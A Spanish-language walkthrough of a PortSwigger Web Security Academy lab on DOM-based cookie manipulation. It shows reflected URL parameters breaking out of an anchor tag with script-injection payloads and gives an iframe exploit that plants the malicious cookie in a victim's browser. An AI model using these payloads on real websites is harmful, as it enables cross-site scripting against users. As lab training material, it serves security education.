DOM-based cookie manipulation
![[20251011235521.png]](/assets/20251011235521.DHXyPWeE.png)
El sitio web tiene el siguiente contenido:
![[20251011235641.png]](/assets/20251011235641.CD71C0Vq.png)
Encontraremos un botón Last viewed product
![[20251012000106.png]](/assets/20251012000106.okW3yhsg.png)
En el codigo fuente podemos observar que este refleja o se ve en el código html
![[20251012000118.png]](/assets/20251012000118.D40q_pXD.png)
c
<section class="top-links">
<a href=/>Home</a><p>|</p>
<a href='https://0ac3008704f0f2d3803c94ea0033004f.web-security-academy.net/product?productId=1&test'>Last viewed product</a><p>|</p>
</section>Ahora cuando ingresamos :
c
https://0ac3008704f0f2d3803c94ea0033004f.web-security-academy.net/product?productId=1&%27>%20<script>alert(1)</script>![[20251012000723.png]](/assets/20251012000723.DDnRF3ld.png)
Y vemos que ya nos pone de manera separada el <script>alert(1)</script>. Luego agregaremos el tag de </a> y este funciona.
c
&%27></a>%20<script>alert(1)</script>![[20251012000738.png]](/assets/20251012000738.DsmOXwmE.png)
Para poder enviar a la victima lo pondremos en un iframe y guardamos, para luego enviarla.
c
<iframe src="https://0ac3008704f0f2d3803c94ea0033004f.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://0ac3008704f0f2d3803c94ea0033004f.web-security-academy.net';window.x=1;">